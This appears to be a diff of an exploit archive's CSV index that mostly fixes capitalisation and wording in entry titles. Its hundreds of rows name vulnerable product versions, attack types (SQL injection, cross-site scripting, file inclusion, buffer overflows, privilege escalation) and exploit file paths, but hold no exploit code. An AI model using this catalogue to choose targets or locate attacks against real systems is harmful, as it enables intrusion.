25093,platforms/php/webapps/25093.txt,"MercuryBoard 1.1 - index.php SQL Injection",2005-02-09,Zeelock,php,webapps,0 -25094,platforms/windows/remote/25094.c,"MSN Messenger 6.2.0137 - .png Buffer Overflow",2005-02-08,ATmaCA,windows,remote,0 +25094,platforms/windows/remote/25094.c,"MSN Messenger 6.2.0137 - '.png' Buffer Overflow",2005-02-08,ATmaCA,windows,remote,0 25095,platforms/windows/remote/25095.txt,"Microsoft Internet Explorer 5.0.1 - Mouse Event URI Status Bar Obfuscation",2005-02-14,Paul,windows,remote,0 25096,platforms/cgi/webapps/25096.txt,"AWStats 5.x/6.x - Debug Remote Information Disclosure",2005-02-14,GHC,cgi,webapps,0 25097,platforms/php/webapps/25097.txt,"Brooky CubeCart 2.0.1/2.0.4 - ndex.php language Parameter Cross-Site Scripting",2005-02-14,"John Cobb",php,webapps,0 @@ -22272,7 +22273,7 @@ id,file,description,date,author,platform,type,port 25117,platforms/php/webapps/25117.txt,"paFaq beta4 - comment.php Multiple Parameter SQL Injection",2005-02-17,pi3ch,php,webapps,0 25118,platforms/php/webapps/25118.txt,"BibORB 1.3.2 - bibindex.php search Parameter Cross-Site Scripting",2005-02-17,"Patrick Hof",php,webapps,0 25119,platforms/php/webapps/25119.txt,"BibORB 1.3.2 - Add Database Description Parameter Cross-Site Scripting",2005-02-17,"Patrick Hof",php,webapps,0 -25120,platforms/php/webapps/25120.txt,"BibORB 1.3.2 - 'index.php' Traversal Arbitrary File Manipulation",2005-02-17,"Patrick Hof",php,webapps,0 +25120,platforms/php/webapps/25120.txt,"BibORB 1.3.2 - 'index.php' Traversal Arbitrary File manipulation",2005-02-17,"Patrick Hof",php,webapps,0 25121,platforms/php/webapps/25121.txt,"BibORB 1.3.2 Login Module - Multiple Parameter SQL Injection",2005-02-17,"Patrick Hof",php,webapps,0 25122,platforms/linux/remote/25122.txt,"glFTPd 1.x/2.0 'ZIP' Plugins - Multiple Directory Traversal Vulnerabilities",2005-02-18,"Paul Craig",linux,remote,0 25123,platforms/php/webapps/25123.txt,"TrackerCam 5.12 - ComGetLogFile.php3 fm Parameter Traversal Arbitrary File Access",2005-02-18,"Luigi Auriemma",php,webapps,0 @@ -22281,7 +22282,7 @@ id,file,description,date,author,platform,type,port 25126,platforms/php/webapps/25126.txt,"eggBlog 4.1.2 - Arbitrary File Upload",2013-05-01,Pokk3rs,php,webapps,0 25127,platforms/php/webapps/25127.txt,"PMachine Pro 2.4 - Remote File Inclusion",2005-02-19,kc,php,webapps,0 25128,platforms/windows/dos/25128.txt,"Easy Icon Maker 5.01 - Crash (PoC)",2013-05-01,Asesino04,windows,dos,0 -25129,platforms/windows/remote/25129.html,"Microsoft Internet Explorer 6.0 - Pop-up Window Title Bar Spoofing",2005-02-21,"bitlance winter",windows,remote,0 +25129,platforms/windows/remote/25129.html,"Microsoft Internet Explorer 6 - Pop-up Window Title Bar Spoofing",2005-02-21,"bitlance winter",windows,remote,0 25130,platforms/windows/local/25130.py,"FuzeZip 1.0.0.131625 - SEH Buffer Overflow",2013-05-01,RealPentesting,windows,local,0 25131,platforms/windows/local/25131.py,"WinArchiver 3.2 - SEH Buffer Overflow",2013-05-01,RealPentesting,windows,local,0 25132,platforms/multiple/remote/25132.txt,"Bontago Game Server 1.1 - Remote Nickname Buffer Overrun",2005-02-21,"Luigi Auriemma",multiple,remote,0 @@ -22289,7 +22290,7 @@ id,file,description,date,author,platform,type,port 25134,platforms/linux/local/25134.c,"sudo 1.8.0-1.8.3p1 (sudo_debug) - Root Exploit + glibc FORTIFY_SOURemote Code Execution Bypass",2013-05-01,aeon,linux,local,0 25135,platforms/windows/dos/25135.txt,"Syslog Watcher Pro 2.8.0.812 - (Date Parameter) Cross-Site Scripting",2013-05-01,demonalex,windows,dos,0 25136,platforms/php/remote/25136.rb,"phpMyAdmin - Authenticated Remote Code Execution via preg_replace()",2013-05-01,Metasploit,php,remote,0 -25137,platforms/php/remote/25137.rb,"Wordpress W3 Total Cache Plugin - PHP Code Execution",2013-05-01,Metasploit,php,remote,0 +25137,platforms/php/remote/25137.rb,"WordPress W3 Total Cache Plugin - PHP Code Execution",2013-05-01,Metasploit,php,remote,0 25138,platforms/hardware/webapps/25138.txt,"D-Link IP Cameras - Multiple Vulnerabilities",2013-05-01,"Core Security",hardware,webapps,0 25139,platforms/hardware/webapps/25139.txt,"Vivotek IP Cameras - Multiple Vulnerabilities",2013-05-01,"Core Security",hardware,webapps,0 25140,platforms/windows/dos/25140.txt,"WPS Office - Wpsio.dll Stack Buffer Overflow",2013-05-01,Zhangjiantao,windows,dos,0 @@ -22302,20 +22303,20 @@ id,file,description,date,author,platform,type,port 25147,platforms/cgi/webapps/25147.txt,"Biz Mail Form 2.x - Unauthorized Mail Relay",2005-02-22,"Jason Frisvold",cgi,webapps,0 25148,platforms/asp/webapps/25148.txt,"Mono 1.0.5 - Unicode Character Conversion Multiple Cross-Site Scripting Vulnerabilities",2005-02-22,"Andrey Rusyaev",asp,webapps,0 25149,platforms/php/webapps/25149.txt,"iGeneric iG Shop 1.x - Multiple SQL Injections",2005-02-22,"John Cobb",php,webapps,0 -25150,platforms/linux/remote/25150.txt,"Winace UnAce 1.x - ACE Archive Remote Directory Traversal",2005-02-23,"Ulf Harnhammar",linux,remote,0 +25150,platforms/linux/remote/25150.txt,"Winace UnAce 1.x - ACE Archive Directory Traversal",2005-02-23,"Ulf Harnhammar",linux,remote,0 25151,platforms/php/webapps/25151.txt,"PBLang Bulletin Board System 4.6 - search.php Cross-Site Scripting",2005-02-23,"Hackerlounge Research Group",php,webapps,0 -25152,platforms/php/webapps/25152.txt,"PHPMyAdmin 2.6 - select_server.lib.php Multiple Parameter Cross-Site Scripting",2005-02-24,"Maksymilian Arciemowicz",php,webapps,0 -25153,platforms/php/webapps/25153.txt,"PHPMyAdmin 2.6 - display_tbl_links.lib.php Multiple Parameter Cross-Site Scripting",2005-02-24,"Maksymilian Arciemowicz",php,webapps,0 -25154,platforms/php/webapps/25154.txt,"PHPMyAdmin 2.6 - theme_left.css.php Multiple Parameter Cross-Site Scripting",2005-02-24,"Maksymilian Arciemowicz",php,webapps,0 -25155,platforms/php/webapps/25155.txt,"PHPMyAdmin 2.6 - theme_right.css.php Multiple Parameter Cross-Site Scripting",2005-02-24,"Maksymilian Arciemowicz",php,webapps,0 +25152,platforms/php/webapps/25152.txt,"phpMyAdmin 2.6 - select_server.lib.php Multiple Parameter Cross-Site Scripting",2005-02-24,"Maksymilian Arciemowicz",php,webapps,0 +25153,platforms/php/webapps/25153.txt,"phpMyAdmin 2.6 - display_tbl_links.lib.php Multiple Parameter Cross-Site Scripting",2005-02-24,"Maksymilian Arciemowicz",php,webapps,0 +25154,platforms/php/webapps/25154.txt,"phpMyAdmin 2.6 - theme_left.css.php Multiple Parameter Cross-Site Scripting",2005-02-24,"Maksymilian Arciemowicz",php,webapps,0 +25155,platforms/php/webapps/25155.txt,"phpMyAdmin 2.6 - theme_right.css.php Multiple Parameter Cross-Site Scripting",2005-02-24,"Maksymilian Arciemowicz",php,webapps,0 25156,platforms/php/webapps/25156.txt,"phpMyAdmin 2.6 - Multiple Local File Inclusion",2005-02-24,"Maksymilian Arciemowicz",php,webapps,0 25157,platforms/windows/remote/25157.txt,"Microsoft Log Sink Class - ActiveX Control Arbitrary File Creation",2003-04-29,"Shane Hird",windows,remote,0 -25158,platforms/php/webapps/25158.txt,"OOApp GuestBook - Multiple HTML Injection Vulnerabilities",2005-02-24,m1o1d1,php,webapps,0 +25158,platforms/php/webapps/25158.txt,"OOApp Guestbook - Multiple HTML Injection Vulnerabilities",2005-02-24,m1o1d1,php,webapps,0 25159,platforms/jsp/webapps/25159.txt,"cyclades alterpath manager 1.1 - Multiple Vulnerabilities",2005-02-24,sullo@cirt.net,jsp,webapps,0 25160,platforms/php/webapps/25160.txt,"PunBB 3.0/3.1 - Multiple Remote Input Validation Vulnerabilities",2005-02-24,"John Gumbel",php,webapps,0 25161,platforms/php/webapps/25161.txt,"phpWebSite 0.x - Image File Processing Arbitrary PHP File Upload",2005-02-24,tjomka,php,webapps,0 25162,platforms/php/webapps/25162.txt,"CubeCart 2.0.x - Multiple Cross-Site Scripting Vulnerabilities",2005-02-25,Lostmon,php,webapps,0 -25163,platforms/windows/remote/25163.txt,"CIS WebServer 3.5.13 - Remote Directory Traversal",2005-02-25,CorryL,windows,remote,0 +25163,platforms/windows/remote/25163.txt,"CIS WebServer 3.5.13 - Directory Traversal",2005-02-25,CorryL,windows,remote,0 25164,platforms/linux/dos/25164.txt,"Gaim 1.1.3 - File Download Denial of Service",2005-02-25,"Randall Perry",linux,dos,0 25165,platforms/multiple/dos/25165.c,"Stormy Studios KNet 1.x - Remote Buffer Overflow",2005-02-26,Expanders,multiple,dos,0 25166,platforms/windows/remote/25166.c,"Working Resources BadBlue 2.55 - MFCISAPICommand Remote Buffer Overflow (1)",2004-12-26,"Miguel Tarasc",windows,remote,0 @@ -22329,30 +22330,30 @@ id,file,description,date,author,platform,type,port 25174,platforms/php/webapps/25174.txt,"PHPCOIN 1.2 - mod.php Multiple Parameter Cross-Site Scripting",2005-03-01,Lostmon,php,webapps,0 25175,platforms/php/webapps/25175.txt,"PHPCOIN 1.2 - 'login.php' Multiple Parameter Cross-Site Scripting",2005-03-01,Lostmon,php,webapps,0 25176,platforms/php/webapps/25176.txt,"PBLang Bulletin Board System 4.x - SendPM.php Directory Traversal",2005-03-01,Raven,php,webapps,0 -25177,platforms/php/webapps/25177.txt,"CutePHP CuteNews 1.3.6 - X-Forwarded-For Script Injection",2005-03-01,FraMe,php,webapps,0 +25177,platforms/php/webapps/25177.txt,"CutePHP CuteNews 1.3.6 - x-forwarded-for Script Injection",2005-03-01,FraMe,php,webapps,0 25178,platforms/php/webapps/25178.txt,"427BB 2.x - Multiple Remote HTML Injection Vulnerabilities",2005-03-01,"Hackerlounge Research Group",php,webapps,0 25179,platforms/php/webapps/25179.txt,"PBLang Bulletin Board System 4.x - DelPM.php Arbitrary Personal Message Deletion",2005-03-01,Raven,php,webapps,0 25180,platforms/php/webapps/25180.py,"PHPNews 1.2.3/1.2.4 - auth.php Remote File Inclusion",2005-03-01,mozako,php,webapps,0 25181,platforms/windows/remote/25181.py,"Cerulean Studios Trillian 3.0 - Remote .png Image File Parsing Buffer Overflow",2005-03-02,"Tal Zeltzer",windows,remote,0 25182,platforms/php/webapps/25182.txt,"auraCMS 1.5 - Multiple Cross-Site Scripting Vulnerabilities",2005-03-02,"echo staff",php,webapps,0 -25195,platforms/windows/remote/25195.txt,"Oracle Database 8i/9i - Multiple Remote Directory Traversal Vulnerabilities",2005-03-07,"Cesar Cerrudo",windows,remote,0 +25195,platforms/windows/remote/25195.txt,"Oracle Database 8i/9i - Multiple Directory Traversal Vulnerabilities",2005-03-07,"Cesar Cerrudo",windows,remote,0 25196,platforms/windows/remote/25196.txt,"Yahoo! Messenger 5.x/6.0 - Offline Mode Status Remote Buffer Overflow",2005-03-08,"Mehrtash Mallahzadeh",windows,remote,0 25197,platforms/php/webapps/25197.txt,"PHP-Fusion 5.0 - BBCode IMG Tag Script Injection",2005-03-08,FireSt0rm,php,webapps,0 25198,platforms/jsp/webapps/25198.txt,"OutStart Participate Enterprise 3 - Multiple Access Validation Vulnerabilities",2005-03-08,Altrus,jsp,webapps,0 25199,platforms/php/webapps/25199.txt,"YaBB 2.0 - Remote UsersRecentPosts Cross-Site Scripting",2005-03-08,trueend5,php,webapps,0 25200,platforms/php/webapps/25200.txt,"PHP Arena PAFileDB 3.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-03-08,sp3x@securityreason.com,php,webapps,0 -25201,platforms/cgi/webapps/25201.txt,"NewsScript - Access Validation",2005-03-08,adrianc23@gmail.com,cgi,webapps,0 +25201,platforms/cgi/webapps/25201.txt,"Newsscript - Access Validation",2005-03-08,adrianc23@gmail.com,cgi,webapps,0 25202,platforms/linux/local/25202.c,"Linux Kernel 2.6.x - 'SYS_EPoll_Wait' Local Integer Overflow Privilege Escalation (1)",2005-03-09,sd,linux,local,0 25203,platforms/linux/local/25203.c,"Linux Kernel 2.6.9 / 2.6.11 (RHEL4) - SYS_EPoll_Wait Local Integer Overflow Privilege Escalation (2)",2005-03-09,alert7,linux,local,0 25204,platforms/windows/local/25204.py,"ABBS Audio Media Player 3.1 - '.lst' Buffer Overflow",2013-05-04,"Julien Ahrens",windows,local,0 25205,platforms/multiple/remote/25205.txt,"Techland XPand Rally 1.0/1.1 - Remote Format String",2005-03-10,"Luigi Auriemma",multiple,remote,0 25206,platforms/php/webapps/25206.txt,"phpoutsourcing zorum 3.5 - Multiple Vulnerabilities",2005-03-10,benjilenoob,php,webapps,0 -25207,platforms/windows/remote/25207.txt,"py software active webcam webserver 4.3/5.5 - Multiple Vulnerabilities",2005-03-10,Sowhat,windows,remote,0 -25208,platforms/php/webapps/25208.txt,"All Enthusiast PhotoPost PHP Pro 5.0 - adm-photo.php Arbitrary Image Manipulation",2005-03-10,"Igor Franchuk",php,webapps,0 +25207,platforms/windows/remote/25207.txt,"py software active webcam WebServer 4.3/5.5 - Multiple Vulnerabilities",2005-03-10,Sowhat,windows,remote,0 +25208,platforms/php/webapps/25208.txt,"All Enthusiast PhotoPost PHP Pro 5.0 - adm-photo.php Arbitrary Image manipulation",2005-03-10,"Igor Franchuk",php,webapps,0 25209,platforms/multiple/remote/25209.pl,"MySQL 4.x - CREATE FUNCTION Arbitrary libc Code Execution",2005-03-11,"Stefano Di Paola",multiple,remote,0 25210,platforms/multiple/remote/25210.php,"MySQL 4.x - CREATE FUNCTION mysql.func Table Arbitrary Library Injection",2005-03-11,"Stefano Di Paola",multiple,remote,0 -25211,platforms/multiple/remote/25211.c,"MySQL 4.x - CREATE TEMPORARY TABLE Symlink Privilege Escalation",2006-01-18,"Marco Ivaldi",multiple,remote,0 -25212,platforms/php/webapps/25212.txt,"UBBCentral UBB.threads 6.0 - editpost.php SQL Injection",2005-03-11,"ADZ Security Team",php,webapps,0 +25211,platforms/multiple/remote/25211.c,"MySQL 4.x - CREATE Temporary TABLE Symlink Privilege Escalation",2006-01-18,"Marco Ivaldi",multiple,remote,0 +25212,platforms/php/webapps/25212.txt,"UBBCentral UBB.Threads 6.0 - editpost.php SQL Injection",2005-03-11,"ADZ Security Team",php,webapps,0 25213,platforms/php/webapps/25213.txt,"PAFileDB 1.1.3/2.1.1/3.0/3.1 - viewall.php start Parameter SQL Injection",2005-03-12,sp3x@securityreason.com,php,webapps,0 25214,platforms/php/webapps/25214.txt,"PAFileDB 1.1.3/2.1.1/3.0/3.1 - category.php start Parameter SQL Injection",2005-03-12,sp3x@securityreason.com,php,webapps,0 25215,platforms/php/webapps/25215.txt,"PAFileDB 1.1.3/2.1.1/3.0/3.1 - viewall.php start Parameter Cross-Site Scripting",2005-03-12,sp3x@securityreason.com,php,webapps,0 @@ -22364,10 +22365,10 @@ id,file,description,date,author,platform,type,port 25221,platforms/linux/remote/25221.txt,"Mozilla Suite/Firefox/Thunderbird - Nested Anchor Tag Status Bar Spoofing",2005-03-14,"bitlance winter",linux,remote,0 25222,platforms/php/webapps/25222.html,"HolaCMS 1.2.x/1.4.x - Voting Module Directory Traversal Remote File Corruption",2005-03-13,"Virginity Security",php,webapps,0 25223,platforms/php/webapps/25223.txt,"Phorum 5.0.14 - Multiple Subject and Attachment HTML Injection Vulnerabilities",2005-03-14,"Jon Oberheide",php,webapps,0 -25224,platforms/php/webapps/25224.txt,"SimpGB 1.0 - guestbook.php SQL Injection",2005-03-14,visus,php,webapps,0 +25224,platforms/php/webapps/25224.txt,"SimpGB 1.0 - Guestbook.php SQL Injection",2005-03-14,visus,php,webapps,0 25225,platforms/php/webapps/25225.txt,"PHPAdsNew 2.0.4 - AdFrame.php Cross-Site Scripting",2005-03-14,"Maksymilian Arciemowicz",php,webapps,0 25226,platforms/php/webapps/25226.txt,"VoteBox 2.0 - Votebox.php Remote File Inclusion",2005-03-14,SmOk3,php,webapps,0 -25227,platforms/php/webapps/25227.txt,"PHPOpenChat 2.3.4/3.0.1 - PoC_loginform.php PHPbb_root_path Parameter Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0 +25227,platforms/php/webapps/25227.txt,"PHPOpenChat 2.3.4/3.0.1 - PoC_loginform.php phpbb_root_path Parameter Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0 25228,platforms/php/webapps/25228.txt,"PHPOpenChat 2.3.4/3.0.1 - PoC.php Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0 25229,platforms/php/webapps/25229.txt,"PHPOpenChat 2.3.4/3.0.1 - ENGLISH_poc.php Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0 25230,platforms/php/webapps/25230.txt,"PunBB 1.2.3 - Multiple HTML Injection Vulnerabilities",2005-03-16,"benji lemien",php,webapps,0 @@ -22391,17 +22392,17 @@ id,file,description,date,author,platform,type,port 25249,platforms/php/webapps/25249.txt,"Webid 1.0.6 - Multiple Vulnerabilities",2013-05-06,"Ahmed Aboul-Ela",php,webapps,0 25250,platforms/php/webapps/25250.txt,"OpenDocMan 1.2.6.5 - Persistent Cross-Site Scripting",2013-05-06,drone,php,webapps,0 25251,platforms/hardware/webapps/25251.txt,"D-Link DSL-320B - Multiple Vulnerabilities",2013-05-06,m-1-k-3,hardware,webapps,0 -25252,platforms/asp/webapps/25252.txt,"betaparticle blog 2.0/3.0 - dbBlogMX.mdb Direct Request Database Disclosure",2005-03-21,"farhad koosha",asp,webapps,0 -25253,platforms/asp/webapps/25253.txt,"betaparticle blog 2.0/3.0 - upload.asp Unauthenticated File Upload",2005-03-21,"farhad koosha",asp,webapps,0 -25254,platforms/asp/webapps/25254.txt,"betaparticle blog 2.0/3.0 - myFiles.asp Unauthenticated File Manipulation",2005-03-21,"farhad koosha",asp,webapps,0 +25252,platforms/asp/webapps/25252.txt,"BetaParticle blog 2.0/3.0 - dbBlogMX.mdb Direct Request Database Disclosure",2005-03-21,"farhad koosha",asp,webapps,0 +25253,platforms/asp/webapps/25253.txt,"BetaParticle blog 2.0/3.0 - upload.asp Unauthenticated File Upload",2005-03-21,"farhad koosha",asp,webapps,0 +25254,platforms/asp/webapps/25254.txt,"BetaParticle blog 2.0/3.0 - myFiles.asp Unauthenticated File manipulation",2005-03-21,"farhad koosha",asp,webapps,0 25255,platforms/windows/dos/25255.txt,"FUN labs Game Engine - Multiple Remote Denial of Service Vulnerabilities",2005-03-20,"Luigi Auriemma",windows,dos,0 -25256,platforms/osx/local/25256.c,"Apple Mac OSX 10.3.x - Multiple Vulnerabilities",2005-03-21,V9,osx,local,0 +25256,platforms/osx/local/25256.c,"Apple Mac OS X 10.3.x - Multiple Vulnerabilities",2005-03-21,V9,osx,local,0 25257,platforms/php/webapps/25257.txt,"Kayako ESupport 2.3 - 'index.php' Multiple Parameter Cross-Site Scripting",2005-03-22,"James Bercegay",php,webapps,0 25258,platforms/php/webapps/25258.txt,"Phorum 3.x/5.0.x - HTTP Response Splitting",2005-03-22,"Alexander Anisimov",php,webapps,0 25259,platforms/windows/dos/25259.py,"Microsoft Windows XP - Local Denial of Service",2005-03-22,liquid@cyberspace.org,windows,dos,0 25260,platforms/php/webapps/25260.txt,"Vortex Portal 2.0 - 'index.php' act Parameter Remote File Inclusion",2005-03-23,"Francisco Alisson",php,webapps,0 25261,platforms/php/webapps/25261.txt,"Vortex Portal 2.0 - content.php act Parameter Remote File Inclusion",2005-03-23,"Francisco Alisson",php,webapps,0 -25262,platforms/php/webapps/25262.txt,"InterSpire ArticleLive 2005 - NewComment Cross-Site Scripting",2005-03-23,mircia,php,webapps,0 +25262,platforms/php/webapps/25262.txt,"Interspire ArticleLive 2005 - NewComment Cross-Site Scripting",2005-03-23,mircia,php,webapps,0 25263,platforms/php/webapps/25263.txt,"DigitalHive 2.0 - msg.php Cross-Site Scripting",2005-03-23,"benji lemien",php,webapps,0 25264,platforms/php/webapps/25264.txt,"DigitalHive 2.0 - membres.php mt Parameter Cross-Site Scripting",2005-03-23,"benji lemien",php,webapps,0 25265,platforms/php/webapps/25265.txt,"PHPSysInfo 2.0/2.3 - 'index.php' sensor_program Parameter Cross-Site Scripting",2005-03-23,"Maksymilian Arciemowicz",php,webapps,0 @@ -22417,26 +22418,26 @@ id,file,description,date,author,platform,type,port 25275,platforms/linux/remote/25275.c,"Smail-3 - Multiple Remote and Local Vulnerabilities",2005-03-25,infamous42md,linux,remote,0 25276,platforms/php/webapps/25276.txt,"PHPMyDirectory 10.1.3 - review.php Multiple Parameter Cross-Site Scripting",2005-03-25,mircia,php,webapps,0 25277,platforms/hardware/dos/25277.txt,"Netcomm NB1300 Modem/Router - Remote Denial of Service",2005-03-25,"Chris Rock",hardware,dos,0 -25278,platforms/php/webapps/25278.sh,"ESMI PayPal Storefront 1.7 - pages.php idpages Parameter SQL Injection",2005-03-26,Dcrab,php,webapps,0 -25279,platforms/php/webapps/25279.txt,"ESMI PayPal Storefront 1.7 - products1.php id2 Parameter SQL Injection",2005-03-26,Dcrab,php,webapps,0 -25280,platforms/php/webapps/25280.txt,"ESMI PayPal Storefront 1.7 - Cross-Site Scripting",2005-03-26,Dcrab,php,webapps,0 +25278,platforms/php/webapps/25278.sh,"ESMI PayPal StoreFront 1.7 - pages.php idpages Parameter SQL Injection",2005-03-26,Dcrab,php,webapps,0 +25279,platforms/php/webapps/25279.txt,"ESMI PayPal StoreFront 1.7 - products1.php id2 Parameter SQL Injection",2005-03-26,Dcrab,php,webapps,0 +25280,platforms/php/webapps/25280.txt,"ESMI PayPal StoreFront 1.7 - Cross-Site Scripting",2005-03-26,Dcrab,php,webapps,0 25281,platforms/windows/dos/25281.py,"Apple QuickTime 6.5.1 - PictureViewer Buffer Overflow",2005-03-26,liquid@cyberspace.org,windows,dos,0 -25282,platforms/php/webapps/25282.txt,"Nuke Bookmarks 0.6 - Marks.php Full Path Disclosure",2005-03-26,"Gerardo Astharot Di Giacomo",php,webapps,0 -25283,platforms/php/webapps/25283.txt,"Nuke Bookmarks 0.6 - Multiple Cross-Site Scripting Vulnerabilities",2005-03-26,"Gerardo Astharot Di Giacomo",php,webapps,0 -25284,platforms/php/webapps/25284.txt,"Nuke Bookmarks 0.6 - Marks.php SQL Injection",2005-03-26,"Gerardo Astharot Di Giacomo",php,webapps,0 +25282,platforms/php/webapps/25282.txt,"Nuke BookMarks 0.6 - Marks.php Full Path Disclosure",2005-03-26,"Gerardo Astharot Di Giacomo",php,webapps,0 +25283,platforms/php/webapps/25283.txt,"Nuke BookMarks 0.6 - Multiple Cross-Site Scripting Vulnerabilities",2005-03-26,"Gerardo Astharot Di Giacomo",php,webapps,0 +25284,platforms/php/webapps/25284.txt,"Nuke BookMarks 0.6 - Marks.php SQL Injection",2005-03-26,"Gerardo Astharot Di Giacomo",php,webapps,0 25285,platforms/php/webapps/25285.txt,"MagicScripts E-Store Kit-2 PayPal Edition - Cross-Site Scripting",2005-03-26,Dcrab,php,webapps,0 25286,platforms/php/webapps/25286.txt,"MagicScripts E-Store Kit-2 PayPal Edition - Remote File Inclusion",2005-03-26,Dcrab,php,webapps,0 -25287,platforms/linux/dos/25287.c,"Linux Kernel 2.4.x / 2.6.x - Bluetooth Signed Buffer Index (PoC) (1)",2005-03-28,"ilja van sprundel",linux,dos,0 -25288,platforms/linux/local/25288.c,"Linux Kernel 2.4.x / 2.6.x - Bluetooth Signed Buffer Index Privilege Escalation (2)",2005-04-08,qobaiashi,linux,local,0 -25289,platforms/linux/local/25289.c,"Linux Kernel 2.4.30 / 2.6.11.5 - Bluetooth 'bluez_sock_create' Privilege Escalation",2005-10-19,backdoored.net,linux,local,0 +25287,platforms/linux/dos/25287.c,"Linux Kernel 2.4.x / 2.6.x - BlueTooth Signed Buffer Index (PoC) (1)",2005-03-28,"ilja van sprundel",linux,dos,0 +25288,platforms/linux/local/25288.c,"Linux Kernel 2.4.x / 2.6.x - BlueTooth Signed Buffer Index Privilege Escalation (2)",2005-04-08,qobaiashi,linux,local,0 +25289,platforms/linux/local/25289.c,"Linux Kernel 2.4.30 / 2.6.11.5 - BlueTooth 'bluez_sock_create' Privilege Escalation",2005-10-19,backdoored.net,linux,local,0 25291,platforms/multiple/remote/25291.txt,"Tincat Network Library - Remote Buffer Overflow",2005-03-28,"Luigi Auriemma",multiple,remote,0 25292,platforms/hardware/webapps/25292.txt,"Cisco Linksys E4200 Firmware - Multiple Vulnerabilities",2013-05-07,sqlhacker,hardware,webapps,0 25775,platforms/linux/remote/25775.rb,"Nginx HTTP Server 1.3.9-1.4.0 - Chuncked Encoding Stack Buffer Overflow",2013-05-28,Metasploit,linux,remote,80 25295,platforms/hardware/dos/25295.txt,"Huawei SNMPv3 Service - Multiple Buffer Overflow Vulnerabilities",2013-05-07,"Roberto Paleari",hardware,dos,0 -25296,platforms/windows/local/25296.rb,"AudioCoder - .m3u Buffer Overflow",2013-05-07,Metasploit,windows,local,0 +25296,platforms/windows/local/25296.rb,"AudioCoder - '.m3u' Buffer Overflow",2013-05-07,Metasploit,windows,local,0 25297,platforms/linux/remote/25297.txt,"Dovecot with Exim sender_address Parameter - Remote Command Execution",2013-05-07,"RedTeam Pentesting GmbH",linux,remote,0 25298,platforms/php/webapps/25298.txt,"b2evolution 4.1.6 - Multiple Vulnerabilities",2013-05-07,"High-Tech Bridge SA",php,webapps,80 -25299,platforms/php/webapps/25299.txt,"Tkai's Shoutbox - Query Parameter URI Redirection",2005-03-28,CorryL,php,webapps,0 +25299,platforms/php/webapps/25299.txt,"Tkai's Shoutbox - Query Parameter URI redirection",2005-03-28,CorryL,php,webapps,0 25300,platforms/php/webapps/25300.txt,"EXoops - Multiple Input Validation Vulnerabilities",2005-03-28,"Diabolic Crab",php,webapps,0 25301,platforms/php/webapps/25301.txt,"Valdersoft Shopping Cart 3.0 - Multiple Input Validation Vulnerabilities",2005-03-28,"Diabolic Crab",php,webapps,0 25302,platforms/php/webapps/25302.txt,"PHPCOIN 1.2 - auxpage.php page Parameter Traversal Arbitrary File Access",2005-03-29,"James Bercegay",php,webapps,0 @@ -22448,25 +22449,25 @@ id,file,description,date,author,platform,type,port 33408,platforms/php/webapps/33408.txt,"Horde 3.3.5 - Administration Interface admin/sqlshell.php PATH_INFO Parameter Cross-Site Scripting",2009-12-15,"Juan Galiana Lara",php,webapps,0 25308,platforms/php/webapps/25308.txt,"PhotoPost Pro 5.1 - showgallery.php Multiple Parameter Cross-Site Scripting",2005-03-28,"Diabolic Crab",php,webapps,0 25309,platforms/php/webapps/25309.txt,"PhotoPost Pro 5.1 - showmembers.php Multiple Parameter Cross-Site Scripting",2005-03-28,"Diabolic Crab",php,webapps,0 -25310,platforms/php/webapps/25310.txt,"PhotoPost Pro 5.1 - slideshow.php photo Parameter Cross-Site Scripting",2005-03-28,"Diabolic Crab",php,webapps,0 +25310,platforms/php/webapps/25310.txt,"PhotoPost Pro 5.1 - Slideshow.php photo Parameter Cross-Site Scripting",2005-03-28,"Diabolic Crab",php,webapps,0 25311,platforms/php/webapps/25311.txt,"PhotoPost Pro 5.1 - showmembers.php sl Parameter SQL Injection",2005-03-28,"Diabolic Crab",php,webapps,0 25312,platforms/php/webapps/25312.txt,"PhotoPost Pro 5.1 - showphoto.php photo Parameter SQL Injection",2005-03-28,"Diabolic Crab",php,webapps,0 25313,platforms/asp/webapps/25313.txt,"ACS Blog 0.8/0.9/1.0/1.1 - Name Field HTML Injection",2005-03-28,"Dan Crowley",asp,webapps,0 25314,platforms/php/webapps/25314.txt,"The Includer 1.0/1.1 - Remote File Inclusion",2005-03-29,"hoang yen",php,webapps,0 25315,platforms/php/webapps/25315.html,"Chatness 2.5 - Message Form Field HTML Injection",2005-03-29,3nitro,php,webapps,0 25316,platforms/php/webapps/25316.txt,"CPG Dragonfly 9.0.2.0 - Multiple Cross-Site Scripting Vulnerabilities",2005-03-29,mircia,php,webapps,0 -25317,platforms/php/webapps/25317.txt,"Uapplication Ublog 1.0.x - Cross-Site Scripting",2005-03-29,"PersianHacker Team",php,webapps,0 +25317,platforms/php/webapps/25317.txt,"UApplication Ublog 1.0.x - Cross-Site Scripting",2005-03-29,"PersianHacker Team",php,webapps,0 25318,platforms/asp/webapps/25318.txt,"Iatek IntranetApp 2.3 - ad_click.asp banner_id Parameter SQL Injection",2005-03-29,"Diabolic Crab",asp,webapps,0 -25319,platforms/windows/remote/25319.txt,"FastStone 4in1 Browser 1.2 - Web Server Remote Directory Traversal",2005-03-29,"Donato Ferrante",windows,remote,0 +25319,platforms/windows/remote/25319.txt,"FastStone 4in1 Browser 1.2 - Web Server Directory Traversal",2005-03-29,"Donato Ferrante",windows,remote,0 25320,platforms/php/webapps/25320.txt,"Lighthouse Development Squirrelcart 1.5.5 - SQL Injection",2005-03-29,"Diabolic Crab",php,webapps,0 25321,platforms/linux/remote/25321.c,"YepYep MTFTPD 0.2/0.3 - Remote CWD Argument Format String",2005-03-30,gunzip,linux,remote,0 25322,platforms/linux/dos/25322.c,"Linux Kernel 2.6.10 - File Lock Local Denial of Service",2005-03-30,ChoiX,linux,dos,0 25323,platforms/php/webapps/25323.txt,"InterAKT Online MX Shop 1.1.1 - SQL Injection",2005-03-31,Dcrab,php,webapps,0 25324,platforms/asp/webapps/25324.txt,"ASP-DEV XM Forum RC3 - IMG Tag Script Injection",2005-03-31,Zinho,asp,webapps,0 -25325,platforms/windows/remote/25325.txt,"BlueSoleil 1.4 - Object Push Service Bluetooth File Upload Directory Traversal",2005-04-01,"Kevin Finisterre",windows,remote,0 +25325,platforms/windows/remote/25325.txt,"BlueSoleil 1.4 - Object Push Service BlueTooth File Upload Directory Traversal",2005-04-01,"Kevin Finisterre",windows,remote,0 